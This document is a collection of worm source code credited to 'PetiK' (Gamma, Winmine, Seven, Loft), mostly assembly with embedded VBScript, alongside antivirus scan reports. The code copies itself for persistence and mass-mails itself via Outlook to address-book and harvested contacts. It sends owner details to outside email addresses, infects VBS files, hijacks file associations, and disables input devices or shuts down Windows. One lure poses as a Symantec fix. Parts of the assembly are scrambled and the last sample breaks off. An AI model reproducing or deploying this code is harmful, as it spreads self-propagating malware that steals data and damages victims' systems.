DIR db "C:\Data",00h information db "C:\Data\info.vbs",00h infoexec db "wscript C:\Data\info.vbs",00h mirc db "C:\gamma",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h script3 db "C:\progra~1\mirc\script.ini",00h script4 db "C:\progra~1\mirc32\script.ini",00h Copie db "\SETUP.EXE",00h Winini db "\\WIN.INI",00h run db "run",00h windows db "windows",00h TEXTE db "This file does not appear to be a Win32 valid file. ",00h TITRE2 db "I-Worm.Gamma (c)2001",00h TEXTE2 db "PetiK greets you",00h symantec db "www.symantec.com",00h tempnetfile db "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",00h Value db "Cache",00h FICHIER db "*.*htm*",00h CREATE_NEW CREATE_ALWAYS FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_NORMAL FILE_MAP_READ FILE_SHARE_READ GENERIC_READ GENERIC_WRITE HKEY_USERS KEY_QUERY_VALUE KEY_SET_VALUE MAX_PATH OPEN_EXISTING PAGE_READONLY REG_SZ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ 00000001h 00000002h 00000001h 00000080h 00000004h 00000001h 80000000h 40000000h 80000003h 00000001h 00000002h 260 00000003h 00000002h 00000001h

SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMillisecond WORD ? SYSTIME ends SystemTime SYSTIME <> time struc LowDateTime dd HighDateTime time ends win32 struc FileAttributes CreationTime LastAccessTime LastWriteTime FileSizeHifh FileSizeLow dd Reserved0 dd Reserved1 dd ? dd ? dd ? time ? time ? time ? dd ? ? ? ?

FileName dd MAX_PATH (?) AlternativeFileName db 13 dup (?) db 3 dup (?) win32 ends CHERCHE win32 <> mircd: db "[script]",0dh,0ah db ";Don't delete this file",0dh,0ah db "n0=ON 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= /.dcc send $nick " szCopie db 50 dup (0) db "",0dh,0ah db "n3=}",0dh,0ah MIRCTAILLE equ $-mircd infod: db ''' Symantec ScriptBlocking Authenticated File',0dh,0ah db ''' A3C7B6E0-5535-11D5-911D-444553546170',0dh,0ah db '',0dh,0ah db 'On Error Resume Next',0dh,0ah db 'set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'set w=CreateObject("WScript.Shell")',0dh,0ah db 'If w.RegRead("HKLM\Software\Gamma\") <> "OK" Then',0dh,0ah db 'set o=CreateObject("Outlook.Application")',0dh,0ah db 'set m=o.CreateItem(0)',0dh,0ah db 'n=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")',0dh,0ah db 'p=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")',0d h,0ah db 'm.To = "gammaworm@multimania.com"',0dh,0ah db 'm.Subject = "Message from " & n',0dh,0ah db 's = "Time : " & time',0dh,0ah db 's = s & vbCrLf & "Date : " & date',0dh,0ah db 's = s & vbCrLf & "Organization : " & p',0dh,0ah db 's = s & vbCrLf & vbCrLf & " I-Worm.Gamma"',0dh,0ah db 'm.Body = s',0dh,0ah db 'm.DeleteAfterSubmit=True',0dh,0ah db 'm.Send',0dh,0ah db 'w.RegWrite "HKLM\Software\Gamma\", "OK"',0dh,0ah db 'End If',0dh,0ah INFOTAILLE equ $-infod Email dd dd dd dd dd dd dd dd dd dd dd dd MelFrom dd dd dd dd dd MelTo dd dd dd dd dd dd Attach dd dd dd dd dd ? offset offset ? offset ? 2 offset 1 offset 1 offset

Subject Message DateS MelFrom MelTo Attach

dd ? ? offset MelFrom offset sAddr ? ? ? 1 offset MelTo offset mail_address ? ? dd ? ? ? offset szOrig ? ?

Subject db "Virus/Worms Fix from Symantec Corporation (Norton Antivirus)",00h Message db "Hi,",0dh,0ah,0dh,0ah db "Symantec Corporation send you the last version of our tool Virus/Worms Fix. " db "Here is the version 3.1 .",0dh,0ah db "This tool detect, repair and protect users against Bloodhound.IRC.Worm, " db "Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .",0dh,0ah,0dh,0ah db 09h,09h,"With Regards,",0dh,0ah db 09h,09h,"Symantec Corporation (http://www.symantec.com)",00h DateS db "06/06/2001",00h sAddr db "snd@symantec.com",00h .code DEBUT: VERIF: call push push push call push push call push push call push push call test jz

push 00h GetModuleHandleA 50 offset szOrig eax GetModuleFileNameA 50h offset szCopie GetSystemDirectoryA offset Copie offset szCopie lstrcat offset szOrig offset szCopie lstrcmp eax,eax MIRC

COPIE: push 00h push offset szCopie push offset szOrig call CopyFileA WININI: push call push push call push push push push call push 50 offset szWinini GetWindowsDirectoryA offset Winini offset szWinini lstrcat offset szWinini offset szCopie offset run offset windows WritePrivateProfileStringA

MESSAGE:push 1010h push offset szOrig push offset TEXTE push 00h call MessageBoxA jmp FIN MIRC: push push push push push push push call mov push push push push push call push call C_MIRC: 00h FILE_ATTRIBUTE_READONLY CREATE_ALWAYS 00h FILE_SHARE_READ GENERIC_WRITE offset mirc CreateFileA [FileHandle],eax 00h offset octets MIRCTAILLE offset mircd [FileHandle] WriteFile [FileHandle] CloseHandle push 00h

push push call push push push call push push push call push push push call INFO: push call push push push push push push push call cmp je mov push push push push push call push call push push call DATE: push call cmp jne cmp jne push push push push call push call jmp

offset script1 offset mirc CopyFileA 00h offset script2 offset mirc CopyFileA 00h offset script3 offset mirc CopyFileA 00h offset script4 offset mirc CopyFileA offset DIR CreateDirectoryA 00h FILE_ATTRIBUTE_NORMAL CREATE_NEW 00h FILE_SHARE_READ GENERIC_WRITE offset information CreateFileA eax,-1 DATE [FileHandle],eax 00h offset octets INFOTAILLE offset infod [FileHandle] WriteFile [FileHandle] CloseHandle 01h offset infoexec WinExec offset SystemTime GetSystemTime [SystemTime.wDayOfWeek],03h NET [SystemTime.wDay],05h NET 40h offset TITRE2 offset TEXTE2 00h MessageBoxA 01h SwapMouseButton NET

PAUSE: push 60 * 3 * 1000 call Sleep NET: push call test jz push push push push push call test jnz push push push push push offset symantec gethostbyname eax,eax PAUSE offset RegHandle KEY_QUERY_VALUE 00h offset tempnetfile HKEY_USERS RegOpenKeyExA eax,eax FIN 7Fh offset szTif offset ValueType 00h offset Value

TIF:

push [RegHandle] call RegQueryValueExA push [RegHandle] call RegCloseKey TIFCH: push offset szTif call SetCurrentDirectoryA FFF: push push call cmp je mov cHTML: FNF: push push call dec jnz FC: push call END_S: FIN: offset CHERCHE offset FICHIER FindFirstFileA eax,-1 FC [SrchHandle],eax call HTML offset CHERCHE [SrchHandle] FindNextFileA eax cHTML [SrchHandle] FindClose popad

push 00h call ExitProcess

HTML: pushad push 00h push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 00h push FILE_SHARE_READ push GENERIC_READ push offset CHERCHE.FileName call CreateFileA inc eax je END_S dec eax xchg eax,ebx xor push push push push push push call test jz xor push push push push push call test jz xchg eax,eax eax eax eax PAGE_READONLY eax ebx CreateFileMappingA eax,eax FERME1 eax,eax eax eax eax FILE_MAP_READ ebp MapViewOfFile eax,eax FERME2 eax,esi

push 00h push ebx call GetFileSize xchg eax,ecx jecxz FERME3 ls_s_m: db @mt: l_s_m: push pop rep call @mt 'mailto:' pop edi pushad 07h ecx cmpsb

popad je s_m inc esi loop l_s_m FERME3: push esi call UnmapViewOfFile FERME2: push ebp call CloseHandle FERME1: push ebx call CloseHandle popad ret s_m: xor edx,edx add esi,7 mov edi,offset mail_address push edi lodsb cmp al,' ' je s_c cmp al,'"' je e_c cmp al,'''' je e_c cmp al,'@' jne o_a inc edx stosb jmp n_c inc esi jmp n_c xor al,al stosb pop edi test edx,edx je ls_s_m xor eax,eax dword ptr [MAPISession] eax eax eax ; password eax ; username eax MAPILogon

n_c:

o_a: s_c: e_c:

mapiln: push push push push push push call

mapism: xor eax,eax push eax push eax push offset Email push eax push word ptr [MAPISession] call MAPISendMail mapilf: push push push push call jmp xor eax,eax eax eax eax dword ptr [MAPISession] MAPILogoff ls_s_m

end DEBUT

File Gamma.exe received on 05.16.2009 11:58:18 (CET)

Antivirus : a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Version / Last Update : 4.0.0.101 2009.05.16 5.0.0.2 2009.05.15 7.9.0.168 2009.05.15 2.0.3.1 2009.05.15 5.1.2.4 2009.05.15 4.8.1335.0 2009.05.15 8.5.0.336 2009.05.15 7.2 2009.05.16 10.00 2009.05.15 0.94.1 2009.05.15 1157 2009.05.08 5.0.0.12182 2009.05.16 7.0.17.0 2009.05.14 31.6.6508 2009.05.16 4.4.4.56 2009.05.15 8.0.14470.0 2009.05.15 3.117.0.0 2009.05.16 19 2009.05.16 T3.1.1.49.0 2009.05.16 7.10.735 2009.05.14 7.0.0.125 2009.05.16 5616 2009.05.15 5616 2009.05.15 6.7.6 2009.05.15 1.4602 2009.05.16 4080 2009.05.15 6.01.05 2009.05.16 2009.1.8.0 2009.05.16 10.0.0.14 2009.05.16 4.4.2.0 2009.05.15 3.0 2009.05.16 21.29.52.00 2009.05.16 4.41.0 2009.05.16 3.2.1858.2 2009.05.16 1.4.4.12 2009.05.16 6.3.4.1.326 2009.05.15 8.950.0.1092 2009.05.15 3.12.10.5 2009.05.16 2009.5.15.1737 2009.05.15 4.6.5.0 2009.05.15

Result : Email-Worm.Win32.Petik!IK Win32/PetTick.8704 Worm/Petik.AV.09 Worm/Win32.Win32 W32/Malware!d62f Win32:Gamma I-Worm/Petik Win32.Petik.C@mm Worm.Petik.AV.09 Worm.Win32.Petik.C Win32.Petik.8704 Win32/Mania W32/Malware!d62f Email-Worm.Win32.Petik W32/PetTick.D@mm Win32.Petik.C@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.AV.09 Worm:Win32/Petik.C@mm Win32/Petik.C W32/Pet_Tick.8704.A DDoS/Petik.C I-Worm.Gamma.A Worm.Mail.Petik.g W32/Gamma BehavesLike.Win32.Malware (v) W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.D OScope.Dialer.GMHA I-Worm.Win32.PetTick.8704.A I-Worm.Gamma.A

Additional information
File size: 8704 bytes
MD5...: 997ae169da2f57e7e48e6862eb70223a
SHA1..: b7349d6e5c65551d1162597cf4871b0c8e04e6b1

comment #
Name : I-Worm.Winmine
Author : PetiK
Date : June 12th - June 15th
Size : 6656 bytes
Action : Checks whether the file is run from the SYSTEM folder. If so, it creates a file named "C:\ENVOIE_VBS.vbs" to spread with Outlook :
Subject : Is the work so hard ??
Body : Relax you with the last version of <Winmine>.
Attached : WINMINE.EXE
It changes the Internet Explorer start page to "http://perso.libertysurf.fr/dacruz/mayaindex.html". If the current day is the 15th, it displays a message and swaps the mouse buttons; after five minutes, the worm shuts down the computer. Otherwise, it copies itself to the SYSTEM folder, alters the load= line in the WIN.INI file so that it runs when the computer starts, and displays a message box.
#

.586p .model flat .code callx macro a extrn a:proc call a endm DEBUT: VERIF: push 00h callx GetModuleHandleA push 50 push offset szOrig push eax callx GetModuleFileNameA push 50h push offset szCopie callx GetSystemDirectoryA push offset Copie push offset szCopie callx lstrcat push offset szOrig push offset szCopie callx lstrcmp test eax,eax jz SEND COPIE: push 00h push offset szCopie push offset szOrig callx CopyFileA WININI: push 50 push offset szWinini callx GetWindowsDirectoryA push offset Winini push offset szWinini callx lstrcat push offset szWinini push offset szCopie push offset load push offset windows callx WritePrivateProfileStringA MESSAGE:push 1040h push offset TITRE push offset TEXTE push 00h callx MessageBoxA jmp FIN SEND: push 00h push FILE_ATTRIBUTE_READONLY

GO:

push CREATE_NEW push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset vbssend callx CreateFileA cmp eax,-1 je GO mov [FileHandle],eax push 00h push offset octets push VBSTAILLE push offset vbsd push [FileHandle] callx WriteFile push [FileHandle] callx CloseHandle push 01h push offset onyva callx WinExec

DLL:

push offset dllName callx LoadLibraryA test eax,eax jz DATE mov hdll,eax push offset FunctionName push hdll callx GetProcAddress test eax,eax jz DATE mov setvalue,eax REG: push 08h push offset start_page push 01h push offset start_key push offset main_s push HKEY_CURRENT_USER call [setvalue] FINDLL: push [hdll] callx FreeLibrary DATE: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDay],0Fh jne FIN push 40h push offset TITRE2 push offset TEXTE2 push 00h callx MessageBoxA push 01h callx SwapMouseButton push 60 * 5 * 1000 callx Sleep push EWX_SHUTDOWN callx ExitWindowsEx FIN: push 00h callx ExitProcess

.data szCopie szOrig szWinini FileHandle octets hdll setvalue Copie vbssend onyva Winini load windows

db db db dd dd dd dd db db db db db db

50 dup (0) 50 dup (0) 50 dup (0) ? ? ? ? "\WINMINE.EXE",00h "C:\ENVOIE_VBS.vbs",00h "wscript C:\ENVOIE_VBS.vbs",00h "\\WIN.INI",00h "load",00h "windows",00h

TITRE TEXTE Corporation",00h TITRE2 TEXTE2 main_s start_key start_page dllName FunctionName wormname

db "Winmine - Microsoft Corporation (R)",00h db "The last update of the game ""Winmine"" written by Microsoft db db db db db db db db "I-Worm.Winmine",00h "By PetiK (c)2001",00h "Software\Microsoft\Internet Explorer\Main",00h "Start Page",00h "http://perso.libertysurf.fr/dacruz/mayaindex.html",00h "SHLWAPI.dll",00h "SHSetValueA",00h "I-Worm.Winmine by PetiK",00h

vbsd: db 'On Error Resume Next',0dh,0ah db 'Set A=CreateObject("Outlook.Application")',0dh,0ah db 'Set B=A.GetNameSpace("MAPI")',0dh,0ah db 'For Each C In B.AddressLists',0dh,0ah db 'If C.AddressEntries.Count <> 0 Then',0dh,0ah db 'For D=1 To C.AddressEntries.count',0dh,0ah db 'Set E=C.AddressEntries(D)',0dh,0ah db 'Set F=A.CreateItem(0)',0dh,0ah db 'F.To=E.Address',0dh,0ah db 'F.Subject="Is the work so hard ??"',0dh,0ah db 'F.Body="Relax you with the last version of <Winmine>."',0dh,0ah db 'Set G=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'F.Attachments.Add G.BuildPath(G.GetSpecialFolder(1),"Winmine.exe")',0dh,0ah db 'F.DeleteAfterSubmit=True',0dh,0ah db 'If F.To <> "" Then',0dh,0ah db 'F.Send',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',00h VBSTAILLE equ $-vbsd CREATE_NEW FILE_ATTRIBUTE_READONLY FILE_SHARE_READ GENERIC_WRITE HKEY_CURRENT_USER EWX_SHUTDOWN SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMillisecond WORD ? SYSTIME ends SystemTime SYSTIME <> end DEBUT end equ equ equ equ equ equ 00000001h 00000001h 00000001h 40000000h 80000001h 00000001h

File Winmine.exe received on 05.10.2009 23:52:01 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6497 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.729 7.0.0.125 5611 5611 6.7.6 1.4602 4063 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.28.62.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 3.12.10.4 2009.5.9.1727 4.6.5.0 Last Update 2009.05.10 2009.05.09 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.10 2009.05.09 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.08 2009.05.10 2009.05.09 2009.05.10 2009.05.10 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.10 2009.05.10 2009.05.08 2009.05.08 2009.05.10 2009.05.10 2009.05.07 2009.05.10 2009.05.10 2009.05.10 2009.05.09 2009.05.10 2009.05.09 2009.05.08 2009.05.09 2009.05.09 2009.05.10 Result Email-Worm.Win32.Petik!IK Win32/Petik.worm.6656 Worm/Petik.AV.02 Worm/Win32.Win32 W32/Malware!cc55 Win32:Petik-Winmine I-Worm/Petik Generic.Malware.Msp!.4B5A9B45 Worm.Win32.Petik.B Win32.Petik.6656 Win32/Petik.6656.C W32/Malware!cc55 Email-Worm.Win32.Petik W32/Petik!worm Generic.Malware.Msp!.4B5A9B45 Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Worm.Petik.AV.02 Worm:Win32/Pet_tik.G@mm Win32/Petik.B W32/Pet_Tick.6656.C Worm/W32.Petik.6656 W32/Petik I-Worm.Petik.H Medium Risk Malware Trojan.WINMINE W32/Winmine BehavesLike.Win32.Malware (v) W32/PetTick@MM WORM_MINEUP.A Win32.Worm.Petik.8192 I-Worm.Petik.H

Additional information File size: 6656 bytes MD5...: 23f6db768eacfa01a352a657acb26c9b SHA1..: bc83ebddddead5521afeefd9e9df47e342f05153


Name : VBS.Seven.A
Author : PetiK
Date : June 16th 2001
Size : 3626 bytes
Action : It copies itself to \WINDOWS\Seven.vbs, \WINDOWS\SYSTEM\Envy.vbs and \WINDOWS\TEMP\Lust.vbs. It adds values in the Run key (Envy) and in the RunServices key (Lust). When the current day is the 1st, 15th or 30th it adds a value in the Run key of HKCU (Anger=rundll32 mouse,disable), which disables the mouse at each start. When the current day is the 12th or 28th it displays a message box and closes Windows when the user clicks “OK”. When the day is the 14th it displays another message; when the user clicks “OK”, the worm disables the keyboard. When the day is the 5th or 17th, it changes some values in the registry: when the user wants to open a TXT file, “\WINDOWS\Seven.vbs” starts, and the VBS icon is replaced by the TXT icon. It then infects all VBS files it finds on the disk, adding some lines at the end of each file so that \WINDOWS\Seven.vbs runs when the file is run. The worm uses Outlook to spread too :
Subject : What is the seven sins ??
Body : Look at this file and learn them.
Attached : Seven.vbs

'VBS.Seven.A On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set tmp=fso.GetSpecialFolder(2) SEVEN() Sub SEVEN() Set org=fso.GetFile(WScript.ScriptFullname) org.Copy(win&"\Seven.vbs") org.Copy(sys&"\Envy.vbs") org.Copy(tmp&"\Lust.vbs") run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Envy") runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Lust") ws.RegWrite run,sys&"\Envy.vbs" ws.RegWrite runs,tmp&"\Lust.vbs" First() Second() Third() Disk() Send() End Sub Sub First() If Day(Now)=1 or Day(Now)=15 or Day(Now)=30 Then run2=("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Anger") ws.RegWrite run2,"rundll32 mouse,disable" End If End Sub Sub Second() If Day(Now)=12 or Day(Now)=28 Then MsgBox "You're tired now"+VbCrLf+"Switch off you're Computer",vbExclamation,"Seven" ws.Run "rundll32.exe user.exe,exitwindows" End If If Day(Now)=14 Then MsgBox "The keyboard is on strike !",vbInformation,"Seven" ws.Run "rundll32 keyboard,disable" End If End Sub Sub Third() If Day(Now)=5 or Day(Now)=17 Then bur=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Sh ell Folders\Desktop") if not fso.FileExists(win&"\COPYRIGHT.txt.vbs") Then txt=ws.RegRead("HKCR\txtfile\shell\open\command\") ws.RegWrite "HKCR\txtfile\shell\open\command\Pride",txt ws.RegWrite "HKCR\txtfile\shell\open\command\","wscript "&win&"\Seven.vbs" icot=ws.RegRead("HKCR\txtfile\DefaultIcon\") icov=ws.RegRead("HKCR\VBSfile\DefaultIcon\")

ws.RegWrite "HKCR\VBSfile\DefaultIcon\oldicon",icov ws.RegWrite "HKCR\VBSfile\DefaultIcon\",icot Set copy=fso.CreateTextFile (bur&"\COPYRIGHT.txt.vbs") copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" (c)2001"",vbcritical,""VBS.Seven.A""" copy.Close Set copy=fso.CreateTextFile (win&"\COPYRIGHT.txt.vbs") copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" (c)2001"",vbcritical,""VBS.Seven.A""" copy.Close end if End If End Sub Sub Disk Set dr=fso.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then list(d.path&"\") end If Next End Sub Sub infect(dossier) Set f=fso.GetFolder(dossier) Set fc=f.Files For each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) If (ext="vbs") Then Set cot=fso.OpenTextFile(f1.path, 1, False) If cot.ReadLine <> "'VBS.Seven.A" then cot.Close Set cot=fso.OpenTextFile(f1.path, 1, False) vbsorg=cot.ReadAll() cot.Close Set inf=fso.OpenTextFile(f1.path,2,True) inf.WriteLine "'VBS.Seven.A" inf.Write(vbsorg) inf.WriteLine "" inf.WriteLine "Set w=CreateObject(""WScript.Shell"")" inf.WriteLine "Set f=CreateObject(""Scripting.FileSystemObject"")" inf.WriteLine "w.run f.GetSpecialFolder(0)&""\Seven.vbs""" inf.Close End If End If Next End Sub Sub list(dossier) Set f=fso.GetFolder(dossier) Set sf=f.SubFolders For each f1 in sf infect(f1.path) list(f1.path) Next End Sub Sub Send() Set A=CreateObject("Outlook.Application") Set B=A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.count Set E=C.AddressEntries(D) Set F=A.CreateItem(0) F.To=E.Address F.Subject="What is the seven sins ??" F.Body="Look at this file and learn them." Set G=CreateObject("Scripting.FileSystemObject") F.Attachments.Add G.BuildPath(G.GetSpecialFolder(0),"Seven.vbs") F.DeleteAfterSubmit=True If F.To <> "" Then F.Send End If Next End If Next End Sub

By PetiK


File Seven.vbs received on 05.16.2009 19:29:21 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Petik!IK VBS/Petik Worm/Petik.I Worm/Win32.Petik VBS/Petik.S@mm VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.9CAAED1A VBS.Petik.I Worm.Petik.I Unclassified Malware VBS.Petik VBS.SillyWorm. VBS/Chism VBS/Petik.S@mm Email-Worm.Win32.Petik.i VBS/Petik.I Generic.ScriptWorm.9CAAED1A Email-Worm.Win32.Petik Email-Worm.Win32.Petik.i VBS/Chism VBS/Chism Worm.Petik.I Virus:VBS/Chism VBS/Chism VBS/Chism.A@mm VBS.Petik.I@mm VBS/Petik.I VBS.Seven.A VBS.Petik.i VBS/Seven-A VBS.Pet_Tick.gen VBS_PETIK.I-O Email-Worm.Win32.Petik.i VBS.Seven.A

Additional information File size: 3626 bytes MD5...: 8781b9a791c0c144e97a466486f6ef33 SHA1..: 6872bc5747eb4701e579305c68c517e712f680ec

comment #
Name : I-Worm.Loft
Author : PetiK
Date : June 16th - June 22nd
Size : 8704 bytes
Action : If the file is not \WINDOWS\SYSTEM\LOFT.EXE, it copies itself to this file and alters the run= line in the WIN.INI file so that it runs at each start. It copies itself to \WINDOWS\LOFT_STORY.EXE too. Otherwise, it checks whether the key HKCU\Software\Microsoft\PetiK exists. If it does not, the worm creates the file "Loft.htm" in the StartUp folder. When the user accepts the ActiveX control of this page, it modifies the Internet Explorer start page to download the file ActiveX.vbs. This file sends various information about the computer to three addresses : loftptk@multimania(castaldi), petik@multimania.com(vlad14) and euphoria@ctw.net(pk29a). On the 28th of every month it displays a message and modifies the Internet start page, RegisteredOwner and RegisteredOrganization. It checks whether an Internet connection exists; if not, it loops every five seconds, otherwise it displays a message. It scans all *.htm* files in the "Temporary Internet Files" folder to find email addresses.
#

.586p .model flat .code callx macro a extrn a:proc call a endm include useful.inc DEBUT: VERIF: push 00h callx GetModuleHandleA push 50 push offset szOrig push eax callx GetModuleFileNameA push 50h push offset szCopie callx GetSystemDirectoryA @pushsz "\LOFT.EXE" push offset szCopie callx lstrcat push 50h push offset szCopieb callx GetWindowsDirectoryA @pushsz "\LOFT_STORY.EXE" push offset szCopieb callx lstrcat push offset szOrig push offset szCopie callx lstrcmp test eax,eax jz C_PTK COPIE: push 00h push offset szCopie push offset szOrig callx CopyFileA push 00h push offset szCopieb push offset szOrig callx CopyFileA WININI: push 50 push offset szWinini callx GetWindowsDirectoryA @pushsz "\\WIN.INI" push offset szWinini callx lstrcat push offset szWinini

push offset szCopie @pushsz "run" @pushsz "windows" callx WritePrivateProfileStringA MESSAGE:push 1040h @pushsz "Loft Story" @pushsz "I'm fucking the Loft Story" push 00h callx MessageBoxA jmp FIN C_PTK: push offset regDisp push offset regResu push 00h push 0F003Fh push 00h push 00h push 00h @pushsz "Software\Microsoft\PetiK" push HKEY_CURRENT_USER callx RegCreateKeyExA cmp [regDisp],2 je DATE push [regResu] callx RegCloseKey STA_UP: push offset RegHandle push 001F0000h ; KEY_QUERY_VALUE push 00h @pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" push HKEY_USERS callx RegOpenKeyExA test eax,eax jnz FIN push offset BufferSize push offset Buffer push 00h ;ValueType push 00h @pushsz "Startup" push RegHandle callx RegQueryValueExA push [RegHandle] callx RegCloseKey CR_HTM: @pushsz "\Loft.htm" push offset Buffer call lstrcat push 00h push FILE_ATTRIBUTE_NORMAL push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset Buffer callx CreateFileA mov [FileHandle],eax push 00h push offset octets push HTMTAILLE push offset htmd push [FileHandle] callx WriteFile push [FileHandle] callx CloseHandle jmp DLL DATE: push callx cmp jne SHSET: callx test jz mov offset SystemTime GetSystemTime [SystemTime.wDay],28 DLL @pushsz "SHLWAPI.dll" LoadLibraryA eax,eax DLL hdll2,eax

WEB:

@pushsz "SHSetValueA" push hdll2 callx GetProcAddress test eax,eax jz DLL mov setvalue,eax push 08h @pushsz "http://www.loftstory.fr" push 01h @pushsz "Start Page" @pushsz "Software\Microsoft\Internet Explorer\Main" push HKEY_CURRENT_USER call [setvalue] push 08h @pushsz "LoftStory" push 01h @pushsz "RegisteredOrganization" @pushsz "Software\Microsoft\Windows\CurrentVersion" push HKEY_LOCAL_MACHINE call [setvalue] push 08h @pushsz "Aziz, Kenza, Loanna, etc..." push 01h @pushsz "RegisteredOwner" @pushsz "Software\Microsoft\Windows\CurrentVersion" push HKEY_LOCAL_MACHINE call [setvalue] push [hdll2] callx FreeLibrary push 40h @pushsz "I-Worm.LoftStory" @pushsz "New Worm Internet coded by PetiK (c)2001" push 00h callx MessageBoxA

DLL:

@pushsz "WININET.dll" callx LoadLibraryA test eax,eax jz FIN mov hdll,eax @pushsz "InternetGetConnectedState" push hdll callx GetProcAddress test eax,eax jz FIN mov netcheck,eax jmp NET DODO: push 5000 callx Sleep NET: push 00h push offset Temp call [netcheck] dec eax jnz DODO NET_OK: push 40h @pushsz "Loft Story" @pushsz "Welcome to Internet !" push 00h callx MessageBoxA FINDLL: push [hdll] callx FreeLibrary REG: push offset RegHandle push 001F0000h ; KEY_QUERY_VALUE push 00h @pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" push HKEY_USERS callx RegOpenKeyExA test eax,eax jnz FIN push offset BufferSize push offset Buffer push 00h ;ValueType push 00h @pushsz "Cache" push RegHandle

